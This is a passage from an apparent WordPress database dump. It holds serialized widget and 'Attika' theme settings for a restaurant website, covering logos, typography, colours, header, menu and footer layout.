"target_2\";s:6:\"_blank\";s:9:\"fe_icon_3\";s:0:\"\";s:9:\"fa_icon_3\";s:0:\"\";s:10:\"ion_icon_3\";s:0:\"\";s:18:\"simple_line_icon_3\";s:19:\"icon-social-twitter\";s:6:\"link_3\";s:20:\"https://twitter.com/\";s:8:\"target_3\";s:6:\"_blank\";s:9:\"fe_icon_4\";s:0:\"\";s:9:\"fa_icon_4\";s:0:\"\";s:10:\"ion_icon_4\";s:0:\"\";s:18:\"simple_line_icon_4\";s:0:\"\";s:6:\"link_4\";s:0:\"\";s:8:\"target_4\";s:5:\"_self\";s:9:\"fe_icon_5\";s:0:\"\";s:9:\"fa_icon_5\";s:0:\"\";s:10:\"ion_icon_5\";s:0:\"\";s:18:\"simple_line_icon_5\";s:0:\"\";s:6:\"link_5\";s:0:\"\";s:8:\"target_5\";s:5:\"_self\";s:9:\"fe_icon_6\";s:0:\"\";s:9:\"fa_icon_6\";s:0:\"\";s:10:\"ion_icon_6\";s:0:\"\";s:18:\"simple_line_icon_6\";s:0:\"\";s:6:\"link_6\";s:0:\"\";s:8:\"target_6\";s:5:\"_self\";s:6:\"layout\";s:0:\"\";s:4:\"skin\";s:0:\"\";s:9:\"alignment\";s:4:\"left\";s:9:\"icon_size\";s:4:\"16px\";s:5:\"color\";s:7:\"#111111\";s:11:\"hover_color\";s:7:\"#a1a1a1\";s:6:\"margin\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(286328,'widget_mkdf_sticky_sidebar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(286329,'widget_mkdf_search_opener','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(286330,'widget_mkdf_side_area_opener','a:5:{i:2;a:4:{s:10:\"icon_color\";s:0:\"\";s:16:\"icon_hover_color\";s:0:\"\";s:13:\"widget_margin\";s:0:\"\";s:12:\"widget_title\";s:0:\"\";}i:3;a:4:{s:10:\"icon_color\";s:0:\"\";s:16:\"icon_hover_color\";s:0:\"\";s:13:\"widget_margin\";s:16:\"5px 35px 0px 0px\";s:12:\"widget_title\";s:0:\"\";}i:4;a:4:{s:10:\"icon_color\";s:0:\"\";s:16:\"icon_hover_color\";s:0:\"\";s:13:\"widget_margin\";s:0:\"\";s:12:\"widget_title\";s:0:\"\";}i:5;a:4:{s:10:\"icon_color\";s:7:\"#000000\";s:16:\"icon_hover_color\";s:0:\"\";s:13:\"widget_margin\";s:0:\"\";s:12:\"widget_title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(286331,'widget_mkdf_woocommerce_dropdown_cart','a:2:{i:2;a:1:{s:32:\"woocommerce_dropdown_cart_margin\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(286333,'vc_version','6.4.1','yes'),(286334,'mkdf_options_attika','a:823:{s:12:\"google_fonts\";s:2:\"-1\";s:23:\"additional_google_fonts\";s:2:\"no\";s:23:\"additional_google_font1\";s:2:\"-1\";s:23:\"additional_google_font2\";s:2:\"-1\";s:23:\"additional_google_font3\";s:2:\"-1\";s:23:\"additional_google_font4\";s:2:\"-1\";s:23:\"additional_google_font5\";s:2:\"-1\";s:18:\"google_font_weight\";a:1:{i:0;s:0:\"\";}s:18:\"google_font_subset\";a:1:{i:0;s:0:\"\";}s:11:\"first_color\";s:0:\"\";s:21:\"page_background_color\";s:0:\"\";s:21:\"page_background_image\";s:0:\"\";s:28:\"page_background_image_repeat\";s:2:\"no\";s:15:\"selection_color\";s:0:\"\";s:5:\"boxed\";s:2:\"no\";s:28:\"page_background_color_in_box\";s:0:\"\";s:22:\"boxed_background_image\";s:0:\"\";s:30:\"boxed_pattern_background_image\";s:0:\"\";s:33:\"boxed_background_image_attachment\";s:0:\"\";s:8:\"paspartu\";s:2:\"no\";s:14:\"paspartu_color\";s:0:\"\";s:14:\"paspartu_width\";s:0:\"\";s:25:\"paspartu_responsive_width\";s:0:\"\";s:20:\"disable_top_paspartu\";s:2:\"no\";s:21:\"enable_fixed_paspartu\";s:2:\"no\";s:21:\"initial_content_width\";s:14:\"mkdf-grid-1200\";s:21:\"preload_pattern_image\";s:0:\"\";s:18:\"page_smooth_scroll\";s:2:\"no\";s:23:\"smooth_page_transitions\";s:2:\"no\";s:25:\"page_transition_preloader\";s:2:\"no\";s:20:\"smooth_pt_bgnd_color\";s:0:\"\";s:22:\"smooth_pt_spinner_type\";s:0:\"\";s:23:\"smooth_pt_spinner_color\";s:0:\"\";s:23:\"page_transition_fadeout\";s:2:\"no\";s:16:\"show_back_button\";s:3:\"yes\";s:14:\"responsiveness\";s:3:\"yes\";s:9:\"custom_js\";s:0:\"\";s:19:\"google_maps_api_key\";s:0:\"\";s:9:\"hide_logo\";s:2:\"no\";s:10:\"logo_image\";s:82:\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\";s:15:\"logo_image_dark\";s:82:\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\";s:16:\"logo_image_light\";s:82:\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\";s:17:\"logo_image_sticky\";s:82:\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\";s:17:\"logo_image_mobile\";s:82:\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\";s:8:\"h1_color\";s:0:\"\";s:12:\"h1_font_size\";s:0:\"\";s:14:\"h1_line_height\";s:0:\"\";s:17:\"h1_text_transform\";s:0:\"\";s:15:\"h1_google_fonts\";s:2:\"-1\";s:13:\"h1_font_style\";s:0:\"\";s:14:\"h1_font_weight\";s:0:\"\";s:17:\"h1_letter_spacing\";s:5:\"0.5em\";s:13:\"h1_margin_top\";s:0:\"\";s:16:\"h1_margin_bottom\";s:0:\"\";s:8:\"h2_color\";s:0:\"\";s:12:\"h2_font_size\";s:0:\"\";s:14:\"h2_line_height\";s:0:\"\";s:17:\"h2_text_transform\";s:0:\"\";s:15:\"h2_google_fonts\";s:2:\"-1\";s:13:\"h2_font_style\";s:0:\"\";s:14:\"h2_font_weight\";s:0:\"\";s:17:\"h2_letter_spacing\";s:5:\"0.5em\";s:13:\"h2_margin_top\";s:0:\"\";s:16:\"h2_margin_bottom\";s:0:\"\";s:8:\"h3_color\";s:0:\"\";s:12:\"h3_font_size\";s:0:\"\";s:14:\"h3_line_height\";s:0:\"\";s:17:\"h3_text_transform\";s:0:\"\";s:15:\"h3_google_fonts\";s:2:\"-1\";s:13:\"h3_font_style\";s:0:\"\";s:14:\"h3_font_weight\";s:0:\"\";s:17:\"h3_letter_spacing\";s:5:\"0.5em\";s:13:\"h3_margin_top\";s:0:\"\";s:16:\"h3_margin_bottom\";s:0:\"\";s:8:\"h4_color\";s:0:\"\";s:12:\"h4_font_size\";s:0:\"\";s:14:\"h4_line_height\";s:0:\"\";s:17:\"h4_text_transform\";s:0:\"\";s:15:\"h4_google_fonts\";s:2:\"-1\";s:13:\"h4_font_style\";s:0:\"\";s:14:\"h4_font_weight\";s:0:\"\";s:17:\"h4_letter_spacing\";s:5:\"0.4em\";s:13:\"h4_margin_top\";s:0:\"\";s:16:\"h4_margin_bottom\";s:0:\"\";s:8:\"h5_color\";s:0:\"\";s:12:\"h5_font_size\";s:2:\"18\";s:14:\"h5_line_height\";s:0:\"\";s:17:\"h5_text_transform\";s:0:\"\";s:15:\"h5_google_fonts\";s:2:\"-1\";s:13:\"h5_font_style\";s:6:\"italic\";s:14:\"h5_font_weight\";s:0:\"\";s:17:\"h5_letter_spacing\";s:5:\"0.2em\";s:13:\"h5_margin_top\";s:0:\"\";s:16:\"h5_margin_bottom\";s:0:\"\";s:8:\"h6_color\";s:0:\"\";s:12:\"h6_font_size\";s:0:\"\";s:14:\"h6_line_height\";s:0:\"\";s:17:\"h6_text_transform\";s:0:\"\";s:15:\"h6_google_fonts\";s:2:\"-1\";s:13:\"h6_font_style\";s:6:\"italic\";s:14:\"h6_font_weight\";s:0:\"\";s:17:\"h6_letter_spacing\";s:5:\"0.3em\";s:13:\"h6_margin_top\";s:0:\"\";s:16:\"h6_margin_bottom\";s:0:\"\";s:25:\"h1_responsive_font_size_3\";s:4:\"40px\";s:27:\"h1_responsive_line_height_3\";s:0:\"\";s:30:\"h1_responsive_letter_spacing_3\";s:0:\"\";s:25:\"h2_responsive_font_size_3\";s:4:\"35px\";s:27:\"h2_responsive_line_height_3\";s:0:\"\";s:30:\"h2_responsive_letter_spacing_3\";s:4:\".5em\";s:25:\"h3_responsive_font_size_3\";s:4:\"27px\";s:27:\"h3_responsive_line_height_3\";s:0:\"\";s:30:\"h3_responsive_letter_spacing_3\";s:0:\"\";s:25:\"h4_responsive_font_size_3\";s:0:\"\";s:27:\"h4_responsive_line_height_3\";s:0:\"\";s:30:\"h4_responsive_letter_spacing_3\";s:0:\"\";s:25:\"h5_responsive_font_size_3\";s:0:\"\";s:27:\"h5_responsive_line_height_3\";s:0:\"\";s:30:\"h5_responsive_letter_spacing_3\";s:0:\"\";s:25:\"h6_responsive_font_size_3\";s:0:\"\";s:27:\"h6_responsive_line_height_3\";s:0:\"\";s:30:\"h6_responsive_letter_spacing_3\";s:0:\"\";s:23:\"h1_responsive_font_size\";s:4:\"40px\";s:25:\"h1_responsive_line_height\";s:0:\"\";s:28:\"h1_responsive_letter_spacing\";s:0:\"\";s:23:\"h2_responsive_font_size\";s:4:\"35px\";s:25:\"h2_responsive_line_height\";s:0:\"\";s:28:\"h2_responsive_letter_spacing\";s:0:\"\";s:23:\"h3_responsive_font_size\";s:4:\"27px\";s:25:\"h3_responsive_line_height\";s:0:\"\";s:28:\"h3_responsive_letter_spacing\";s:0:\"\";s:23:\"h4_responsive_font_size\";s:0:\"\";s:25:\"h4_responsive_line_height\";s:0:\"\";s:28:\"h4_responsive_letter_spacing\";s:0:\"\";s:23:\"h5_responsive_font_size\";s:0:\"\";s:25:\"h5_responsive_line_height\";s:0:\"\";s:28:\"h5_responsive_letter_spacing\";s:0:\"\";s:23:\"h6_responsive_font_size\";s:0:\"\";s:25:\"h6_responsive_line_height\";s:0:\"\";s:28:\"h6_responsive_letter_spacing\";s:0:\"\";s:25:\"h1_responsive_font_size_2\";s:4:\"40px\";s:27:\"h1_responsive_line_height_2\";s:0:\"\";s:30:\"h1_responsive_letter_spacing_2\";s:0:\"\";s:25:\"h2_responsive_font_size_2\";s:4:\"32px\";s:27:\"h2_responsive_line_height_2\";s:0:\"\";s:30:\"h2_responsive_letter_spacing_2\";s:4:\".4em\";s:25:\"h3_responsive_font_size_2\";s:4:\"27px\";s:27:\"h3_responsive_line_height_2\";s:0:\"\";s:30:\"h3_responsive_letter_spacing_2\";s:0:\"\";s:25:\"h4_responsive_font_size_2\";s:0:\"\";s:27:\"h4_responsive_line_height_2\";s:0:\"\";s:30:\"h4_responsive_letter_spacing_2\";s:0:\"\";s:25:\"h5_responsive_font_size_2\";s:4:\"16px\";s:27:\"h5_responsive_line_height_2\";s:0:\"\";s:30:\"h5_responsive_letter_spacing_2\";s:0:\"\";s:25:\"h6_responsive_font_size_2\";s:0:\"\";s:27:\"h6_responsive_line_height_2\";s:0:\"\";s:30:\"h6_responsive_letter_spacing_2\";s:0:\"\";s:10:\"text_color\";s:0:\"\";s:14:\"text_font_size\";s:0:\"\";s:16:\"text_line_height\";s:0:\"\";s:19:\"text_text_transform\";s:0:\"\";s:17:\"text_google_fonts\";s:2:\"-1\";s:15:\"text_font_style\";s:0:\"\";s:16:\"text_font_weight\";s:0:\"\";s:19:\"text_letter_spacing\";s:0:\"\";s:15:\"text_margin_top\";s:0:\"\";s:18:\"text_margin_bottom\";s:0:\"\";s:19:\"text_font_size_res1\";s:0:\"\";s:21:\"text_line_height_res1\";s:0:\"\";s:24:\"text_letter_spacing_res1\";s:0:\"\";s:19:\"text_font_size_res2\";s:0:\"\";s:21:\"text_line_height_res2\";s:0:\"\";s:24:\"text_letter_spacing_res2\";s:0:\"\";s:10:\"link_color\";s:0:\"\";s:15:\"link_hovercolor\";s:0:\"\";s:14:\"link_fontstyle\";s:0:\"\";s:15:\"link_fontweight\";s:0:\"\";s:19:\"link_fontdecoration\";s:0:\"\";s:25:\"link_hover_fontdecoration\";s:0:\"\";s:11:\"header_type\";s:14:\"header-divided\";s:14:\"header_options\";s:14:\"header-divided\";s:16:\"header_behaviour\";s:15:\"fixed-on-scroll\";s:12:\"header_style\";s:0:\"\";s:7:\"top_bar\";s:2:\"no\";s:15:\"top_bar_in_grid\";s:3:\"yes\";s:29:\"top_bar_grid_background_color\";s:0:\"\";s:36:\"top_bar_grid_background_transparency\";s:0:\"\";s:24:\"top_bar_background_color\";s:0:\"\";s:31:\"top_bar_background_transparency\";s:0:\"\";s:14:\"top_bar_border\";s:3:\"yes\";s:20:\"top_bar_border_color\";s:0:\"\";s:14:\"top_bar_height\";s:0:\"\";s:20:\"top_bar_side_padding\";s:0:\"\";s:17:\"logo_area_in_grid\";s:2:\"no\";s:31:\"logo_area_grid_background_color\";s:0:\"\";s:38:\"logo_area_grid_background_transparency\";s:0:\"\";s:24:\"logo_area_in_grid_border\";s:2:\"no\";s:30:\"logo_area_in_grid_border_color\";s:0:\"\";s:26:\"logo_area_background_color\";s:0:\"\";s:33:\"logo_area_background_transparency\";s:0:\"\";s:16:\"logo_area_border\";s:2:\"no\";s:22:\"logo_area_border_color\";s:0:\"\";s:16:\"logo_area_height\";s:0:\"\";s:17:\"menu_area_in_grid\";s:2:\"no\";s:31:\"menu_area_grid_background_color\";s:0:\"\";s:38:\"menu_area_grid_background_transparency\";s:0:\"\";s:24:\"menu_area_in_grid_shadow\";s:2:\"no\";s:24:\"menu_area_in_grid_border\";s:2:\"no\";s:30:\"menu_area_in_grid_border_color\";s:0:\"\";s:26:\"menu_area_background_color\";s:0:\"\";s:33:\"menu_area_background_transparency\";s:0:\"\";s:16:\"menu_area_shadow\";s:2:\"no\";s:16:\"menu_area_border\";s:2:\"no\";s:22:\"menu_area_border_color\";s:0:\"\";s:16:\"menu_area_height\";s:0:\"\";s:22:\"menu_area_side_padding\";s:4:\"30px\";s:31:\"fullscreen_menu_animation_style\";s:20:\"fade-push-text-right\";s:18:\"fullscreen_in_grid\";s:2:\"no\";s:20:\"fullscreen_alignment\";s:0:\"\";s:32:\"fullscreen_menu_background_color\";s:0:\"\";s:39:\"fullscreen_menu_background_transparency\";s:0:\"\";s:32:\"fullscreen_menu_background_image\";s:0:\"\";s:29:\"fullscreen_menu_pattern_image\";s:0:\"\";s:21:\"fullscreen_menu_color\";s:0:\"\";s:27:\"fullscreen_menu_hover_color\";s:0:\"\";s:28:\"fullscreen_menu_active_color\";s:0:\"\";s:28:\"fullscreen_menu_google_fonts\";s:2:\"-1\";s:25:\"fullscreen_menu_font_size\";s:0:\"\";s:27:\"fullscreen_menu_line_height\";s:0:\"\";s:26:\"fullscreen_menu_font_style\";s:0:\"\";s:27:\"fullscreen_menu_font_weight\";s:0:\"\";s:30:\"fullscreen_menu_letter_spacing\";s:0:\"\";s:30:\"fullscreen_menu_text_transform\";s:0:\"\";s:25:\"fullscreen_menu_color_2nd\";s:0:\"\";s:31:\"fullscreen_menu_hover_color_2nd\";s:0:\"\";s:32:\"fullscreen_menu_google_fonts_2nd\";s:2:\"-1\";s:29:\"fullscreen_menu_font_size_2nd\";s:0:\"\";s:31:\"fullscreen_menu_line_height_2nd\";s:0:\"\";s:30:\"fullscreen_menu_font_style_2nd\";s:0:\"\";s:31:\"fullscreen_menu_font_weight_2nd\";s:0:\"\";s:34:\"fullscreen_menu_letter_spacing_2nd\";s:0:\"\";s:34:\"fullscreen_menu_text_transform_2nd\";s:0:\"\";s:25:\"fullscreen_menu_color_3rd\";s:0:\"\";s:31:\"fullscreen_menu_hover_color_3rd\";s:0:\"\";s:32:\"fullscreen_menu_google_fonts_3rd\";s:2:\"-1\";s:29:\"fullscreen_menu_font_size_3rd\";s:0:\"\";s:31:\"fullscreen_menu_line_height_3rd\";s:0:\"\";s:30:\"fullscreen_menu_font_style_3rd\";s:0:\"\";s:31:\"fullscreen_menu_font_weight_3rd\";s:0:\"\";s:34:\"fullscreen_menu_letter_spacing_3rd\";s:0:\"\";s:34:\"fullscreen_menu_text_transform_3rd\";s:0:\"\";s:27:\"fullscreen_menu_icon_source\";s:10:\"predefined\";s:25:\"fullscreen_menu_icon_pack\";s:12:\"font_elegant\";s:29:\"fullscreen_menu_icon_svg_path\";s:0:\"\";s:35:\"fullscreen_menu_close_icon_svg_path\";s:0:\"\";s:26:\"fullscreen_menu_icon_color\";s:0:\"\";s:32:\"fullscreen_menu_icon_hover_color\";s:0:\"\";s:33:\"fullscreen_menu_icon_mobile_color\";s:0:\"\";s:39:\"fullscreen_menu_icon_mobile_hover_color\";s:0:\"\";s:22:\"set_menu_area_position\";s:5:\"right\";s:32:\"vertical_header_background_color\";s:0:\"\";s:32:\"vertical_header_background_image\";s:0:\"\";s:22:\"vertical_header_shadow\";s:2:\"no\";s:22:\"vertical_header_border\";s:2:\"no\";s:28:\"vertical_header_border_color\";s:0:\"\";s:30:\"vertical_header_center_content\";s:2:\"no\";s:24:\"scroll_amount_for_sticky\";s:0:\"\";s:21:\"sticky_header_in_grid\";s:2:\"no\";s:30:\"sticky_header_background_color\";s:7:\"#ffffff\";s:26:\"sticky_header_transparency\";s:2:\".8\";s:26:\"sticky_header_border_color\";s:7:\"#ffffff\";s:20:\"sticky_header_height\";s:0:\"\";s:26:\"sticky_header_side_padding\";s:0:\"\";s:12:\"sticky_color\";s:0:\"\";s:17:\"sticky_hovercolor\";s:0:\"\";s:19:\"sticky_google_fonts\";s:2:\"-1\";s:16:\"sticky_font_size\";s:0:\"\";s:18:\"sticky_line_height\";s:0:\"\";s:21:\"sticky_text_transform\";s:0:\"\";s:17:\"sticky_font_style\";s:0:\"\";s:18:\"sticky_font_weight\";s:0:\"\";s:21:\"sticky_letter_spacing\";s:0:\"\";s:29:\"fixed_header_background_color\";s:0:\"\";s:25:\"fixed_header_transparency\";s:0:\"\";s:32:\"fixed_header_border_bottom_color\";s:0:\"\";s:11:\"fixed_color\";s:0:\"\";s:16:\"fixed_hovercolor\";s:0:\"\";s:18:\"fixed_google_fonts\";s:2:\"-1\";s:15:\"fixed_font_size\";s:0:\"\";s:17:\"fixed_line_height\";s:0:\"\";s:20:\"fixed_text_transform\";s:0:\"\";s:16:\"fixed_font_style\";s:0:\"\";s:17:\"fixed_font_weight\";s:0:\"\";s:20:\"fixed_letter_spacing\";s:0:\"\";s:25:\"dropdown_background_color\";s:0:\"\";s:32:\"dropdown_background_transparency\";s:0:\"\";s:26:\"wide_dropdown_menu_in_grid\";s:2:\"no\";s:34:\"wide_dropdown_menu_content_in_grid\";s:3:\"yes\";s:24:\"menu_dropdown_appearance\";s:23:\"dropdown-animate-height\";s:21:\"dropdown_top_position\";s:0:\"\";s:10:\"menu_color\";s:0:\"\";s:15:\"menu_hovercolor\";s:0:\"\";s:16:\"menu_activecolor\";s:0:\"\";s:21:\"menu_light_hovercolor\";s:0:\"\";s:22:\"menu_light_activecolor\";s:0:\"\";s:20:\"menu_dark_hovercolor\";s:0:\"\";s:21:\"menu_dark_activecolor\";s:0:\"\";s:17:\"menu_google_fonts\";s:2:\"-1\";s:14:\"menu_font_size\";s:0:\"\";s:16:\"menu_line_height\";s:0:\"\";s:15:\"menu_font_style\";s:0:\"\";s:16:\"menu_font_weight\";s:0:\"\";s:19:\"menu_letter_spacing\";s:0:\"\";s:19:\"menu_text_transform\";s:0:\"\";s:23:\"menu_padding_left_right\";s:0:\"\";s:22:\"menu_margin_left_right\";s:0:\"\";s:14:\"dropdown_color\";s:0:\"\";s:19:\"dropdown_hovercolor\";s:0:\"\";s:21:\"dropdown_google_fonts\";s:2:\"-1\";s:18:\"dropdown_font_size\";s:0:\"\";s:20:\"dropdown_line_height\";s:0:\"\";s:19:\"dropdown_font_style\";s:0:\"\";s:20:\"dropdown_font_weight\";s:0:\"\";s:23:\"dropdown_letter_spacing\";s:0:\"\";s:23:\"dropdown_text_transform\";s:0:\"\";s:19:\"dropdown_wide_color\";s:0:\"\";s:24:\"dropdown_wide_hovercolor\";s:0:\"\";s:26:\"dropdown_wide_google_fonts\";s:2:\"-1\";s:23:\"dropdown_wide_font_size\";s:0:\"\";s:25:\"dropdown_wide_line_height\";s:0:\"\";s:24:\"dropdown_wide_font_style\";s:0:\"\";s:25:\"dropdown_wide_font_weight\";s:0:\"\";s:28:\"dropdown_wide_letter_spacing\";s:0:\"\";s:28:\"dropdown_wide_text_transform\";s:0:\"\";s:23:\"dropdown_color_thirdlvl\";s:0:\"\";s:28:\"dropdown_hovercolor_thirdlvl\";s:0:\"\";s:30:\"dropdown_google_fonts_thirdlvl\";s:2:\"-1\";s:27:\"dropdown_font_size_thirdlvl\";s:0:\"\";s:29:\"dropdown_line_height_thirdlvl\";s:0:\"\";s:28:\"dropdown_font_style_thirdlvl\";s:0:\"\";s:29:\"dropdown_font_weight_thirdlvl\";s:0:\"\";s:32:\"dropdown_letter_spacing_thirdlvl\";s:0:\"\";s:32:\"dropdown_text_transform_thirdlvl\";s:0:\"\";s:28:\"dropdown_wide_color_thirdlvl\";s:0:\"\";s:33:\"dropdown_wide_hovercolor_thirdlvl\";s:0:\"\";s:35:\"dropdown_wide_google_fonts_thirdlvl\";s:2:\"-1\";s:32:\"dropdown_wide_font_size_thirdlvl\";s:0:\"\";s:34:\"dropdown_wide_line_height_thirdlvl\";s:0:\"\";s:33:\"dropdown_wide_font_style_thirdlvl\";s:0:\"\";s:34:\"dropdown_wide_font_weight_thirdlvl\";s:0:\"\";s:37:\"dropdown_wide_letter_spacing_thirdlvl\";s:0:\"\";s:37:\"dropdown_wide_text_transform_thirdlvl\";s:0:\"\";s:24:\"vertical_menu_top_margin\";s:0:\"\";s:27:\"vertical_menu_bottom_margin\";s:0:\"\";s:30:\"vertical_menu_dropdown_opening\";s:5:\"below\";s:23:\"vertical_menu_1st_color\";s:0:\"\";s:29:\"vertical_menu_1st_hover_color\";s:0:\"\";s:27:\"vertical_menu_1st_font_size\";s:0:\"\";s:29:\"vertical_menu_1st_line_height\";s:0:\"\";s:32:\"vertical_menu_1st_text_transform\";s:0:\"\";s:30:\"vertical_menu_1st_google_fonts\";s:2:\"-1\";s:28:\"vertical_menu_1st_font_style\";s:0:\"\";s:29:\"vertical_menu_1st_font_weight\";s:0:\"\";s:32:\"vertical_menu_1st_letter_spacing\";s:0:\"\";s:23:\"vertical_menu_2nd_color\";s:0:\"\";s:29:\"vertical_menu_2nd_hover_color\";s:0:\"\";s:27:\"vertical_menu_2nd_font_size\";s:0:\"\";s:29:\"vertical_menu_2nd_line_height\";s:0:\"\";s:32:\"vertical_menu_2nd_text_transform\";s:0:\"\";s:30:\"vertical_menu_2nd_google_fonts\";s:2:\"-1\";s:28:\"vertical_menu_2nd_font_style\";s:0:\"\";s:29:\"vertical_menu_2nd_font_weight\";s:0:\"\";s:32:\"vertical_menu_2nd_letter_spacing\";s:0:\"\";s:23:\"vertical_menu_3rd_color\";s:0:\"\";s:29:\"vertical_menu_3rd_hover_color\";s:0:\"\";s:27:\"vertical_menu_3rd_font_size\";s:0:\"\";s:29:\"vertical_menu_3rd_line_height\";s:0:\"\";s:32:\"vertical_menu_3rd_text_transform\";s:0:\"\";s:30:\"vertical_menu_3rd_google_fonts\";s:2:\"-1\";s:28:\"vertical_menu_3rd_font_style\";s:0:\"\";s:29:\"vertical_menu_3rd_font_weight\";s:0:\"\";s:32:\"vertical_menu_3rd_letter_spacing\";s:0:\"\";s:14:\"side_area_type\";s:26:\"side-menu-slide-from-right\";s:15:\"side_area_width\";s:0:\"\";s:31:\"side_area_content_overlay_color\";s:0:\"\";s:33:\"side_area_content_overlay_opacity\";s:0:\"\";s:21:\"side_area_icon_source\";s:10:\"predefined\";s:19:\"side_area_icon_pack\";s:12:\"linear_icons\";s:23:\"side_area_icon_svg_path\";s:0:\"\";s:29:\"side_area_close_icon_svg_path\";s:0:\"\";s:20:\"side_area_icon_color\";s:0:\"\";s:26:\"side_area_icon_hover_color\";s:0:\"\";s:26:\"side_area_close_icon_color\";s:0:\"\";s:32:\"side_area_close_icon_hover_color\";s:0:\"\";s:26:\"side_area_background_color\";s:0:\"\";s:17:\"side_area_padding\";s:0:\"\";s:18:\"side_area_aligment\";s:0:\"\";s:20:\"mobile_header_height\";s:0:\"\";s:30:\"mobile_header_background_color\";s:0:\"\";s:33:\"mobile_header_border_bottom_color\";s:0:\"\";s:28:\"mobile_menu_background_color\";s:0:\"\";s:31:\"mobile_menu_border_bottom_color\";s:0:\"\";s:27:\"mobile_menu_separator_color\";s:0:\"\";s:18:\"mobile_logo_height\";s:0:\"\";s:25:\"mobile_logo_height_phones\";s:0:\"\";s:17:\"mobile_text_color\";s:0:\"\";s:23:\"mobile_text_hover_color\";s:0:\"\";s:24:\"mobile_text_google_fonts\";s:0:\"\";s:21:\"mobile_text_font_size\";s:0:\"\";s:23:\"mobile_text_line_height\";s:0:\"\";s:26:\"mobile_text_text_transform\";s:0:\"\";s:22:\"mobile_text_font_style\";s:0:\"\";s:23:\"mobile_text_font_weight\";s:0:\"\";s:26:\"mobile_text_letter_spacing\";s:0:\"\";s:26:\"mobile_dropdown_text_color\";s:0:\"\";s:32:\"mobile_dropdown_text_hover_color\";s:0:\"\";s:33:\"mobile_dropdown_text_google_fonts\";s:0:\"\";s:30:\"mobile_dropdown_text_font_size\";s:0:\"\";s:32:\"mobile_dropdown_text_line_height\";s:0:\"\";s:35:\"mobile_dropdown_text_text_transform\";s:0:\"\";s:31:\"mobile_dropdown_text_font_style\";s:0:\"\";s:32:\"mobile_dropdown_text_font_weight\";s:0:\"\";s:35:\"mobile_dropdown_text_letter_spacing\";s:0:\"\";s:17:\"mobile_menu_title\";s:0:\"\";s:18:\"mobile_icon_source\";s:10:\"predefined\";s:16:\"mobile_icon_pack\";s:12:\"font_elegant\";s:20:\"mobile_icon_svg_path\";s:0:\"\";s:17:\"mobile_icon_color\";s:0:\"\";s:23:\"mobile_icon_hover_color\";s:0:\"\";s:18:\"search_page_layout\";s:7:\"in-grid\";s:26:\"search_page_sidebar_layout\";s:10:\"no-sidebar\";s:26:\"search_custom_sidebar_area\";s:0:\"\";s:11:\"search_type\";s:10:\"fullscreen\";s:18:\"search_icon_source\";s:9:\"icon_pack\";s:16:\"search_icon_pack\";s:12:\"linear_icons\";s:20:\"search_icon_svg_path\";s:0:\"\";s:26:\"search_close_icon_svg_path\";s:0:\"\";s:22:\"search_sidebar_columns\";s:1:\"3\";s:14:\"search_in_grid\";s:3:\"yes\";s:23:\"header_search_icon_size\";s:0:\"\";s:24:\"header_search_icon_color\";s:0:\"\";s:30:\"header_search_icon_hover_color\";s:0:\"\";s:23:\"enable_search_icon_text\";s:2:\"no\";s:22:\"search_icon_text_color\";s:0:\"\";s:28:\"search_icon_text_color_hover\";s:0:\"\";s:26:\"search_icon_text_font_size\";s:0:\"\";s:28:\"search_icon_text_line_height\";s:0:\"\";s:31:\"search_icon_text_text_transform\";s:0:\"\";s:29:\"search_icon_text_google_fonts\";s:2:\"-1\";s:27:\"search_icon_text_font_style\";s:0:\"\";s:28:\"search_icon_text_font_weight\";s:0:\"\";s:31:\"search_icon_text_letter_spacing\";s:0:\"\";s:15:\"show_title_area\";s:3:\"yes\";s:15:\"title_area_type\";s:6:\"attika\";s:18:\"title_area_in_grid\";s:3:\"yes\";s:17:\"title_area_height\";s:0:\"\";s:27:\"title_area_background_color\";s:0:\"\";s:27:\"title_area_background_image\";s:0:\"\";s:36:\"title_area_background_image_behavior\";s:0:\"\";s:29:\"title_area_vertical_alignment\";s:13:\"header-bottom\";s:20:\"title_area_title_tag\";s:2:\"h2\";s:16:\"page_title_color\";s:0:\"\";s:20:\"page_title_font_size\";s:0:\"\";s:22:\"page_title_line_height\";s:0:\"\";s:25:\"page_title_text_transform\";s:0:\"\";s:23:\"page_title_google_fonts\";s:2:\"-1\";s:21:\"page_title_font_style\";s:0:\"\";s:22:\"page_title_font_weight\";s:0:\"\";s:25:\"page_title_letter_spacing\";s:0:\"\";s:23:\"title_area_subtitle_tag\";s:2:\"h6\";s:19:\"page_subtitle_color\";s:0:\"\";s:23:\"page_subtitle_font_size\";s:0:\"\";s:25:\"page_subtitle_line_height\";s:0:\"\";s:28:\"page_subtitle_text_transform\";s:0:\"\";s:26:\"page_subtitle_google_fonts\";s:2:\"-1\";s:24:\"page_subtitle_font_style\";s:0:\"\";s:25:\"page_subtitle_font_weight\";s:0:\"\";s:28:\"page_subtitle_letter_spacing\";s:0:\"\";s:15:\"page_grid_space\";s:0:\"\";s:18:\"page_show_comments\";s:3:\"yes\";s:15:\"content_padding\";s:0:\"\";s:23:\"content_padding_in_grid\";s:0:\"\";s:22:\"content_padding_mobile\";s:0:\"\";s:26:\"enable_content_bottom_area\";s:2:\"no\";s:37:\"content_bottom_sidebar_custom_display\";s:0:\"\";s:22:\"content_bottom_in_grid\";s:3:\"yes\";s:31:\"content_bottom_background_color\";s:0:\"\";s:21:\"reviews_section_title\";s:0:\"\";s:24:\"reviews_section_subtitle\";s:0:\"\";s:14:\"sidebar_layout\";s:10:\"no-sidebar\";s:19:\"custom_sidebar_area\";s:0:\"\";s:14:\"footer_in_grid\";s:3:\"yes\";s:17:\"uncovering_footer\";s:2:\"no\";s:15:\"show_footer_top\";s:3:\"yes\";s:18:\"footer_top_columns\";s:2:\"12\";s:28:\"footer_top_columns_alignment\";s:6:\"center\";s:27:\"footer_top_background_color\";s:7:\"#f5f7f8\";s:18:\"show_footer_bottom\";s:3:\"yes\";s:21:\"footer_bottom_columns\";s:2:\"12\";s:30:\"footer_bottom_b